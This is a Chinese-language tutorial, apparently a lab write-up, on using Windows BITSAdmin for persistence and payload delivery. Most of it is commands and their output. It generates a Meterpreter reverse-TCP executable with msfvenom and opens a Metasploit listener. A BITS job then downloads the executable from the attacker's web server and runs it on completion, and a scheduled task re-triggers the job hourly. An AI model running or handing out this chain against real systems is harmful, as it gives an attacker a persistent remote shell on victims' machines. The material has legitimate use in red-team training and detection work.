BITSAdmin
BITSAdmin是一种命令行工具,可以用来创建下载或上传作业,并监视它们的进度。
Metasploit
使用Metasploit生成payload:
┌──(root㉿kali)-[/var/www/html/test]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.145 LPORT=4444 -f exe > bits.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes在Metasploit的终端中执行以下命令开启监听:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.8.145
lhost => 192.168.8.145
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > exploit在Windows主机上创建一个Job:
PS C:\Users\snowwolf\Desktop> bitsadmin /create ghostwolflab
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
Created job {720868B7-62A2-45B8-B55F-400BD6533ABD}.然后添加要传输的文件:
PS C:\Users\snowwolf\Desktop> bitsadmin /addfile ghostwolflab http://192.168.8.145/test/bits.exe C:\Users\snowwolf\Desktop\bits.exe
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
Added http://192.168.8.145/test/bits.exe -> C:\Users\snowwolf\Desktop\bits.exe to job.之后设置一个执行的命令,该命令会下载文件并执行payload:
PS C:\Users\snowwolf\Desktop> bitsadmin /SetNotifyCmdLine ghostwolflab cmd.exe "/c bitsadmin.exe /complete ghostwolflab | start /B C:\Users\snowwolf\Desktop\bits.exe"
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
notification command line set to 'cmd.exe' '/c bitsadmin.exe /complete ghostwolflab | start /B C:\Users\snowwolf\Desktop\bits.exe'.之后我们需要设置一个BITSAdmin的最短重试延迟时间,防止出现错误一直运行:
PS C:\Users\snowwolf\Desktop> bitsadmin /SetMinRetryDelay ghostwolflab 120
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
Minimum retry delay set to 120.然后,我们将其添加为计划任务,每60分钟运行一次:
PS C:\Users\snowwolf\Desktop> schtasks /create /tn ghostwolflab /tr "C:\system32\bitsadmin.exe /resume ghostwolflab" /sc minute /mo 60
错误: 任务名 ghostwolflab 已经存在。
要替换它吗(Y/N)?y
成功: 成功创建计划任务 "ghostwolflab"。执行以下命令直接获取会话:
PS C:\Users\snowwolf\Desktop> schtasks /run /tn ghostwolflab
成功: 尝试运行 "ghostwolflab"。